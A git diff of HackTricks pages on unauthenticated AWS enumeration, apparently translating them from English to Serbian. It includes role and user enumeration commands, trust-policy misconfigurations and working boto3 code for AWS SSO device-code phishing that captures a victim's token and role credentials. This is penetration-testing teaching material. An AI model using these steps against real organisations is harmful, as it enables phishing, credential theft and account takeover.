+Ako Elastic Beanstalk okruženje koristi load balancer i load balancer je konfiguran da bude javno dostupan, napadači mogu **slati zahteve direktno na load balancer**. Iako to možda nije problem za web aplikacije koje su namenjene javnoj dostupnosti, to može biti problem za privatne aplikacije ili okruženja.
 
-### Publicly Accessible S3 Buckets
+### Javna dostupnost S3 Bucketa
 
-Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**.
-
-### Enumerate Public Environments
+Elastic Beanstalk aplikacije se često čuvaju u S3 bucketima pre implementacije. Ako je S3 bucket koji sadrži aplikaciju javno dostupan, napadač bi mogao **preuzeti kod aplikacije i tražiti ranjivosti ili osetljive informacije**.
 
+### Enumeracija javnih okruženja
 ```bash
 aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md
index 6ed2b74fe..9ecbbfaec 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md
@@ -2,15 +2,9 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Javni URL šablon
 ```
 https://vpc-{user_provided}-[random].[region].es.amazonaws.com
 https://search-{user_provided}-[random].[region].es.amazonaws.com
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md
index b6092fda4..2daa69f46 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md
@@ -1,180 +1,162 @@
-# AWS - IAM & STS Unauthenticated Enum
+# AWS - IAM & STS Neautentifikovana Enumeracija
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Enumerate Roles & Usernames in an account
+## Enumeracija Uloga i Korisničkih Imena u nalogu
 
-### ~~Assume Role Brute-Force~~
+### ~~Pretpostavi Ulogu Brute-Force~~
 
 > [!CAUTION]
-> **This technique doesn't work** anymore as if the role exists or not you always get this error:
+> **Ova tehnika više ne funkcioniše** jer, bez obzira na to da li uloga postoji ili ne, uvek dobijate ovu grešku:
 >
-> `An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas`
+> `Došlo je do greške (AccessDenied) prilikom pozivanja operacije AssumeRole: Korisnik: arn:aws:iam::947247140022:user/testenv nije ovlašćen da izvrši: sts:AssumeRole na resursu: arn:aws:iam::429217632764:role/account-balanceasdas`
 >
-> You can **test this running**:
+> Možete **testirati ovo pokretanjem**:
 >
 > `aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example`
 
-Attempting to **assume a role without the necessary permissions** triggers an AWS error message. For instance, if unauthorized, AWS might return:
-
+Pokušaj da **pretpostavite ulogu bez potrebnih dozvola** pokreće AWS poruku o grešci. Na primer, ako niste ovlašćeni, AWS može vratiti:
 ```ruby
 An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::012345678901:user/MyUser is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS
 ```
-
-This message confirms the role's existence but indicates that its assume role policy does not permit your assumption. In contrast, trying to **assume a non-existent role leads to a different error**:
-
+Ova poruka potvrđuje postojanje uloge, ali ukazuje da njena politika preuzimanja uloge ne dozvoljava vaše preuzimanje. Nasuprot tome, pokušaj da se **preuzme nepostojeća uloga dovodi do druge greške**:
 ```less
 An error occurred (AccessDenied) when calling the AssumeRole operation: Not authorized to perform sts:AssumeRole
 ```
+Zanimljivo je da je ova metoda **razlikovanja između postojećih i nepostojećih uloga** primenljiva čak i između različitih AWS naloga. Sa važećim AWS ID-om naloga i ciljanom listom reči, može se enumerisati uloge prisutne u nalogu bez suočavanja sa bilo kakvim inherentnim ograničenjima.
 
-Interestingly, this method of **discerning between existing and non-existing roles** is applicable even across different AWS accounts. With a valid AWS account ID and a targeted wordlist, one can enumerate the roles present in the account without facing any inherent limitations.
+Možete koristiti ovaj [skript za enumeraciju potencijalnih principala](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum) zloupotrebljavajući ovaj problem.
 
-You can use this [script to enumerate potential principals](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum) abusing this issue.
+### Politike poverenja: Brute-Force Cross Account uloge i korisnici
 
-### Trust Policies: Brute-Force Cross Account roles and users
-
-Configuring or updating an **IAM role's trust policy involves defining which AWS resources or services are permitted to assume that role** and obtain temporary credentials. If the specified resource in the policy **exists**, the trust policy saves **successfully**. However, if the resource **does not exist**, an **error is generated**, indicating that an invalid principal was provided.
+Konfigurisanje ili ažuriranje **politike poverenja IAM uloge uključuje definisanje koji AWS resursi ili usluge su dozvoljeni da preuzmu tu ulogu** i dobiju privremene akreditive. Ako navedeni resurs u politici **postoji**, politika poverenja se **uspešno** čuva. Međutim, ako resurs **ne postoji**, **javlja se greška**, koja ukazuje na to da je dostavljen nevažeći principal.
 
 > [!WARNING]
-> Note that in that resource you could specify a cross account role or user:
+> Imajte na umu da u tom resursu možete navesti cross account ulogu ili korisnika:
 >
 > - `arn:aws:iam::acc_id:role/role_name`
 > - `arn:aws:iam::acc_id:user/user_name`
 
-This is a policy example:
-
+Ovo je primer politike:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::216825089941:role/Test"
-      },
-      "Action": "sts:AssumeRole"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::216825089941:role/Test"
+},
+"Action": "sts:AssumeRole"
+}
+]
 }
 ```
-
 #### GUI
 
-That is the **error** you will find if you uses a **role that doesn't exist**. If the role **exist**, the policy will be **saved** without any errors. (The error is for update, but it also works when creating)
+To je **greška** koju ćete pronaći ako koristite **ulogu koja ne postoji**. Ako uloga **postoji**, politika će biti **sačuvana** bez grešaka. (Greška se odnosi na ažuriranje, ali takođe funkcioniše i prilikom kreiranja)
 
 ![](<../../../images/image (153).png>)
 
 #### CLI
-
 ```bash
 ### You could also use: aws iam update-assume-role-policy
 # When it works
 aws iam create-role --role-name Test-Role --assume-role-policy-document file://a.json
 {
-    "Role": {
-        "Path": "/",
-        "RoleName": "Test-Role",
-        "RoleId": "AROA5ZDCUJS3DVEIYOB73",
-        "Arn": "arn:aws:iam::947247140022:role/Test-Role",
-        "CreateDate": "2022-05-03T20:50:04Z",
-        "AssumeRolePolicyDocument": {
-            "Version": "2012-10-17",
-            "Statement": [
-                {
-                    "Effect": "Allow",
-                    "Principal": {
-                        "AWS": "arn:aws:iam::316584767888:role/account-balance"
-                    },
-                    "Action": [
-                        "sts:AssumeRole"
-                    ]
-                }
-            ]
-        }
-    }
+"Role": {
+"Path": "/",
+"RoleName": "Test-Role",
+"RoleId": "AROA5ZDCUJS3DVEIYOB73",
+"Arn": "arn:aws:iam::947247140022:role/Test-Role",
+"CreateDate": "2022-05-03T20:50:04Z",
+"AssumeRolePolicyDocument": {
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::316584767888:role/account-balance"
+},
+"Action": [
+"sts:AssumeRole"
+]
+}
+]
+}
+}
 }
 
 # When it doesn't work
 aws iam create-role --role-name Test-Role2 --assume-role-policy-document file://a.json
 An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2"
 ```
-
-You can automate this process with [https://github.com/carlospolop/aws_tools](https://github.com/carlospolop/aws_tools)
+Možete automatizovati ovaj proces sa [https://github.com/carlospolop/aws_tools](https://github.com/carlospolop/aws_tools)
 
 - `bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt`
 
-Our using [Pacu](https://github.com/RhinoSecurityLabs/pacu):
+Našim korišćenjem [Pacu](https://github.com/RhinoSecurityLabs/pacu):
 
 - `run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt`
 - `run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt`
-- The `admin` role used in the example is a **role in your account to by impersonated** by pacu to create the policies it needs to create for the enumeration
+- U ovom primeru, `admin` uloga je **uloga u vašem nalogu koja će biti imitirana** od strane pacu da kreira politike koje su mu potrebne za enumeraciju
 
 ### Privesc
 
-In the case the role was bad configured an allows anyone to assume it:
-
+U slučaju da je uloga loše konfigurisana i omogućava bilo kome da je preuzme:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": "sts:AssumeRole"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "sts:AssumeRole"
+}
+]
 }
 ```
+Napadač bi to mogao samo pretpostaviti.
 
-The attacker could just assume it.
-
-## Third Party OIDC Federation
-
-Imagine that you manage to read a **Github Actions workflow** that is accessing a **role** inside **AWS**.\
-This trust might give access to a role with the following **trust policy**:
+## Treća strana OIDC federacija
 
+Zamislite da ste uspeli da pročitate **Github Actions workflow** koji pristupa **rolu** unutar **AWS**.\
+Ova poverenja može omogućiti pristup roli sa sledećom **politikom poverenja**:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com"
-      },
-      "Action": "sts:AssumeRoleWithWebIdentity",
-      "Condition": {
-        "StringEquals": {
-          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
+}
+}
+}
+]
 }
 ```
+Ova politika poverenja može biti ispravna, ali **nedostatak više uslova** treba da vas navede da joj ne verujete.\
+To je zato što prethodnu ulogu može preuzeti **BILO KO sa Github Actions**! Trebalo bi da navedete u uslovima i druge stvari kao što su naziv organizacije, naziv repozitorijuma, okruženje, grana...
 
-This trust policy might be correct, but the **lack of more conditions** should make you distrust it.\
-This is because the previous role can be assumed by **ANYONE from Github Actions**! You should specify in the conditions also other things such as org name, repo name, env, brach...
-
-Another potential misconfiguration is to **add a condition** like the following:
-
+Još jedna potencijalna pogrešna konfiguracija je da **dodate uslov** kao što je sledeći:
 ```json
 "StringLike": {
-    "token.actions.githubusercontent.com:sub": "repo:org_name*:*"
+"token.actions.githubusercontent.com:sub": "repo:org_name*:*"
 }
 ```
+Napomena da **zvezdica** (\*) pre **dvotačke** (:). Možete kreirati organizaciju kao što je **org_name1** i **pretpostaviti ulogu** iz Github akcije.
 
-Note that **wildcard** (\*) before the **colon** (:). You can create an org such as **org_name1** and **assume the role** from a Github Action.
-
-## References
+## Reference
 
 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
 - [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md
index fd4d31de6..8a83f48e1 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md
@@ -4,33 +4,30 @@
 
 ## AWS Device Code Phishing
 
-Initially proposed in [**this blog post**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/), it's possible to send a **link** to a user using AWS SSO that if the **user accepts** the attacker will be able to get a **token to impersonate the user** and access all the roles the user is able to access in the **Identity Center**.
+Prvobitno predloženo u [**ovom blog postu**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/), moguće je poslati **link** korisniku koji koristi AWS SSO koji, ako **korisnik prihvati**, napadaču će omogućiti da dobije **token za impersonaciju korisnika** i pristup svim rolama kojima korisnik može pristupiti u **Identity Center**.
 
-In order to perform this attack the requisites are:
+Da bi se izveo ovaj napad, zahtevi su:
 
-- The victim needs to use **Identity Center**
-- The attacker must know the **subdomain** used by the victim `.awsapps.com/start`
+- Žrtva mora koristiti **Identity Center**
+- Napadač mora znati **subdomen** koji koristi žrtva `.awsapps.com/start`
 
-Just with the previous info, the **attacker will be able to send a link to the user** that if **accepted** will grant the **attacker access over the AWS user** account.
+Samo sa prethodnim informacijama, **napadač će moći da pošalje link korisniku** koji, ako bude **prihvaćen**, omogućava **napadaču pristup AWS korisničkom** nalogu.
 
-### Attack
+### Napad
 
-1. **Finding the subdomain**
+1. **Pronalaženje subdomena**
 
-The first step of the attacker is to find out the subdomain the victim company is using in their Identity Center. This can be done via **OSINT** or **guessing + BF** as most companies will be using their name or a variation of their name here.
-
-With this info, it's possible to get the region where the Indentity Center was configured with:
+Prvi korak napadača je da sazna koji subdomen koristi kompanija žrtve u svom Identity Center. To se može uraditi putem **OSINT** ili **pogađanja + BF** jer većina kompanija ovde koristi svoje ime ili varijaciju svog imena.
 
+Sa ovom informacijom, moguće je dobiti region u kojem je Identity Center konfigurisan:
 ```bash
 curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
 "region":"us-east-1
 ```
+2. **Generišite link za žrtvu i pošaljite ga**
 
-2. **Generate the link for the victim & Send it**
-
-Run the following code to generate an AWS SSO login link so the victim can authenticate.\
-For the demo, run this code in a python console and do not exit it as later you will need some objects to get the token:
-
+Pokrenite sledeći kod da generišete AWS SSO login link kako bi žrtva mogla da se autentifikuje.\
+Za demo, pokrenite ovaj kod u python konzoli i ne izlazite iz nje jer će vam kasnije biti potrebni neki objekti za dobijanje tokena:
 ```python
 import boto3
 
@@ -39,82 +36,77 @@ AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS
 
 sso_oidc = boto3.client('sso-oidc', region_name=REGION)
 client = sso_oidc.register_client(
-    clientName = 'attacker',
-    clientType = 'public'
+clientName = 'attacker',
+clientType = 'public'
 )
 
 client_id = client.get('clientId')
 client_secret = client.get('clientSecret')
 authz = sso_oidc.start_device_authorization(
-    clientId=client_id,
-    clientSecret=client_secret,
-    startUrl=AWS_SSO_START_URL
+clientId=client_id,
+clientSecret=client_secret,
+startUrl=AWS_SSO_START_URL
 )
 
 url = authz.get('verificationUriComplete')
 deviceCode = authz.get('deviceCode')
 print("Give this URL to the victim: " + url)
 ```
+Pošaljite generisanu vezu žrtvi koristeći svoje sjajne veštine socijalnog inženjeringa!
 
-Send the generated link to the victim using you awesome social engineering skills!
+3. **Sačekajte da žrtva prihvati**
 
-3. **Wait until the victim accepts it**
-
-If the victim was **already logged in AWS** he will just need to accept granting the permissions, if he wasn't, he will need to **login and then accept granting the permissions**.\
-This is how the promp looks nowadays:
+Ako je žrtva **već bila prijavljena na AWS**, samo će morati da prihvati dodeljivanje dozvola, ako nije, moraće da **se prijavi i zatim prihvati dodeljivanje dozvola**.\
+Ovako izgleda promp danas:
 
 

 
-4. **Get SSO access token**
-
-If the victim accepted the prompt, run this code to **generate a SSO token impersonating the user**:
+4. **Dobijte SSO pristupni token**
 
+Ako je žrtva prihvatila promp, pokrenite ovaj kod da **generišete SSO token imitujući korisnika**:
 ```python
 token_response = sso_oidc.create_token(
-    clientId=client_id,
-    clientSecret=client_secret,
-    grantType="urn:ietf:params:oauth:grant-type:device_code",
-    deviceCode=deviceCode
+clientId=client_id,
+clientSecret=client_secret,
+grantType="urn:ietf:params:oauth:grant-type:device_code",
+deviceCode=deviceCode
 )
 sso_token = token_response.get('accessToken')
 ```
+SSO pristupni token je **važeći 8h**.
 
-The SSO access token is **valid for 8h**.
-
-5. **Impersonate the user**
-
+5. **Imitirati korisnika**
 ```python
 sso_client = boto3.client('sso', region_name=REGION)
 
 # List accounts where the user has access
 aws_accounts_response = sso_client.list_accounts(
-        accessToken=sso_token,
-        maxResults=100
+accessToken=sso_token,
+maxResults=100
 )
 aws_accounts_response.get('accountList', [])
 
 # Get roles inside an account
 roles_response = sso_client.list_account_roles(
-        accessToken=sso_token,
-        accountId=
+accessToken=sso_token,
+accountId=
 )
 roles_response.get('roleList', [])
 
 # Get credentials over a role
 
 sts_creds = sso_client.get_role_credentials(
-        accessToken=sso_token,
-        roleName=,
-        accountId=
+accessToken=sso_token,
+roleName=,
+accountId=
 )
 sts_creds.get('roleCredentials')
 ```
-
 ### Phishing the unphisable MFA
 
-It's fun to know that the previous attack **works even if an "unphisable MFA" (webAuth) is being used**. This is because the previous **workflow never leaves the used OAuth domain**. Not like in other phishing attacks where the user needs to supplant the login domain, in the case the device code workflow is prepared so a **code is known by a device** and the user can login even in a different machine. If accepted the prompt, the device, just by **knowing the initial code**, is going to be able to **retrieve credentials** for the user.
+Zanimljivo je znati da prethodni napad **radi čak i ako se koristi "unphisable MFA" (webAuth)**. To je zato što prethodni **tok rada nikada ne napušta korišćeni OAuth domen**. Za razliku od drugih phishing napada gde korisnik mora da zameni domen za prijavu, u ovom slučaju je tok rada sa kodom uređaja pripremljen tako da **kod poznaje uređaj** i korisnik može da se prijavi čak i na drugom računaru. Ako se prihvati promp, uređaj, samo **znajući početni kod**, će moći da **dobije akreditive** za korisnika.
 
-For more info about this [**check this post**](https://mjg59.dreamwidth.org/62175.html).
+Za više informacija o ovome [**proverite ovaj post**](https://mjg59.dreamwidth.org/62175.html).
 
 ### Automatic Tools
 
@@ -129,7 +121,3 @@ For more info about this [**check this post**](https://mjg59.dreamwidth.org/6217
 - [https://ramimac.me/aws-device-auth](https://ramimac.me/aws-device-auth)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md
index 38622c338..b48ef12f1 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md
@@ -2,16 +2,10 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Javni URL šablon
 ```
 mqtt://{random_id}.iot.{region}.amazonaws.com:8883
 https://{random_id}.iot.{region}.amazonaws.com:8443
 https://{random_id}.iot.{region}.amazonaws.com:443
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md
index 58b8a1309..3fb85b1cc 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md
@@ -2,14 +2,8 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Javni URL šablon
 ```
 https://{random_id}.kinesisvideo.{region}.amazonaws.com
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md
index 5109a2044..2e064299d 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md
@@ -1,26 +1,20 @@
-# AWS - Lambda Unauthenticated Access
+# AWS - Lambda Neautentifikovani Pristup
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Public Function URL
+## Javni URL Funkcije
 
-It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities.
-
-### Public URL template
+Moguće je povezati **Lambda** sa **javnim URL-om funkcije** koji može da bude dostupan svima. Može sadržati web ranjivosti.
 
+### Šablon javnog URL-a
 ```
 https://{random_id}.lambda-url.{region}.on.aws/
 ```
+### Dobijanje ID-a naloga sa javnog Lambda URL-a
 
-### Get Account ID from public Lambda URL
+Baš kao i kod S3 kanti, Data Exchange i API gateway-a, moguće je pronaći ID naloga koristeći **`aws:ResourceAccount`** **Policy Condition Key** iz javnog lambda URL-a. To se radi pronalaženjem ID-a naloga jedan po jedan karakter koristeći džokere u **`aws:ResourceAccount`** sekciji politike.\
+Ova tehnika takođe omogućava dobijanje **vrednosti oznaka** ako znate ključ oznake (ima nekoliko podrazumevanih zanimljivih).
 
-Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\
-This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones).
-
-You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation.
+Možete pronaći više informacija u [**originalnom istraživanju**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) i alatu [**conditional-love**](https://github.com/plerionhq/conditional-love/) za automatizaciju ove eksploatacije.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md
index 2bbc4fdd6..6a80b7475 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md
@@ -2,16 +2,10 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Javni URL šablon
 ```
 https://{random_id}.mediaconvert.{region}.amazonaws.com
 https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
 https://{random_id}.data.mediastore.{region}.amazonaws.com
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
index ab06211e2..3b10c03cb 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
@@ -1,26 +1,20 @@
-# AWS - MQ Unauthenticated Enum
+# AWS - MQ Neautentifikovana Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Public Port
+## Javni Port
 
 ### **RabbitMQ**
 
-In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-.mq.us-east-1.amazonaws.com/`
+U slučaju **RabbitMQ**, po **defaultu je omogućen javni pristup** i ssl. Ali su vam potrebne **akreditivi** za pristup (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Štaviše, moguće je **pristupiti web menadžment konzoli** ako znate akreditive na `https://b-.mq.us-east-1.amazonaws.com/`
 
 ### ActiveMQ
 
-In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access.
-
-### Public URL template
+U slučaju **ActiveMQ**, po defaultu je omogućen javni pristup i ssl, ali su vam potrebni akreditivi za pristup.
 
+### Javni URL šablon
 ```
 https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/
 ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md
index 9bbbd408d..453b5317c 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md
@@ -2,21 +2,15 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public Port
+### Javni Port
 
-It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured).
+Moguće je **izložiti Kafka broker javnosti**, ali će vam biti potrebne **akreditivi**, IAM dozvole ili važeći sertifikat (u zavisnosti od metode autentifikacije koja je konfigurisana).
 
-It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet.
-
-### Public URL template
+Takođe je **moguće onemogućiti autentifikaciju**, ali u tom slučaju **nije moguće direktno izložiti** port internetu.
 
+### Javni URL šablon
 ```
 b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
 {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md
index 218300e3f..638926068 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md
@@ -1,23 +1,22 @@
-# AWS - RDS Unauthenticated Enum
+# AWS - RDS Neautentifikovana Enumeracija
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## RDS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-relational-database-rds-enum.md
 {{#endref}}
 
-## Public Port
+## Javni Port
 
-It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database.
+Moguće je omogućiti javni pristup **bazi podataka sa interneta**. Napadač će i dalje morati da **zna korisničko ime i lozinku,** IAM pristup, ili **eksploit** da bi ušao u bazu podataka.
 
-## Public RDS Snapshots
-
-AWS allows giving **access to anyone to download RDS snapshots**. You can list these public RDS snapshots very easily from your own account:
+## Javni RDS Snimci
 
+AWS omogućava **pristup svima da preuzmu RDS snimke**. Možete lako nabrojati ove javne RDS snimke iz svog naloga:
 ```bash
 # Public RDS snapshots
 aws rds describe-db-snapshots --include-public
@@ -33,16 +32,9 @@ aws rds describe-db-snapshots --snapshot-type public [--region us-west-2]
 ## Even if in the console appear as there are public snapshot it might be public
 ## snapshots from other accounts used by the current account
 ```
-
-### Public URL template
-
+### Javni URL šablon
 ```
 mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
 postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md
index ab1577a1e..8ad35ea1b 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md
@@ -2,14 +2,8 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Javni URL šablon
 ```
 {user_provided}...redshift.amazonaws.com
 ```
-
